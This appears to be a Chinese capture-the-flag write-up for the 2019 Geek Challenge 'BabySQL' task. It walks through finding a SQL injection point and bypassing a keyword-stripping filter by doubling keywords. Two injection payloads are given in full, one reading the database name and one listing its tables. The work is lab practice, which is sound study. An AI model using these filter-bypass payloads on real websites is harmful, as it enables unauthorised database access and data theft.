[极客大挑战 2019]BabySQL 1

极客大挑战 2019BabySQL 1

文章目录

题目预览

基本测试

这里包数据包放到Burp的Repeater中继续进行

单引号测试报错,#号闭合回显,说明有SQL注入点

注意:这里面的空格用+号替换

查列数

回显发现过滤了or,by,回显中留下了der,判断是用replace替换过滤,后面用双写绕过

双写后继续测试

最后测试完是3列

测数据库

后续测试中过滤什么,就双写什么

sql 复制代码
ununionion+seselectlect+1,2,database()%23

测试到数据库是geek

测数据表

sql 复制代码
ununionion+seselectlect+1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23

测数据字段

测字段值

完结~

相关推荐
2501_915921431 小时前
抓包鹰 Traceeagle 解除证书绑定,SSL Pinning 解除
网络·网络协议·网络安全·ios·adb·https·ssl
盗理者6 小时前
AI Agent 技能分享|SQL 性能诊断与优化
java·sql·spring·skill
上海云盾商务经理杨杨8 小时前
SQL 盲注入渗透实战!无报错页面也能成功注入
数据库·sql
han_hanker9 小时前
SQL语法 一个统计的查询
sql
小绫网络安全10 小时前
【每日一讲】Pikachu漏洞练习靶场
网络·web安全·网络安全·靶场·pikachu
Yan_chen66610 小时前
CTFHub XSS反射型实战攻略
前端·网络安全·漏洞·xss·ctfhub web前置技能
竹枝溪10 小时前
MySQL数据库零基础入门
数据库·sql·mysql·navicat·ddl·dml·dql
Aision_12 小时前
实习手记 Day:从 ELK 到 Agent 的“最后一公里”——告警消费与上下文富化
运维·人工智能·web安全·elk·网络安全·安全威胁分析
smilejingwei1 天前
CodeBuddy+SQLazy 编写复杂 SQL 详解
sql·codebuddy·sqlazy
Atomic121381 天前
CVE 漏洞复现通论:从漏洞情报到 Root Cause 分析的标准化实战指南
web安全·网络安全·渗透测试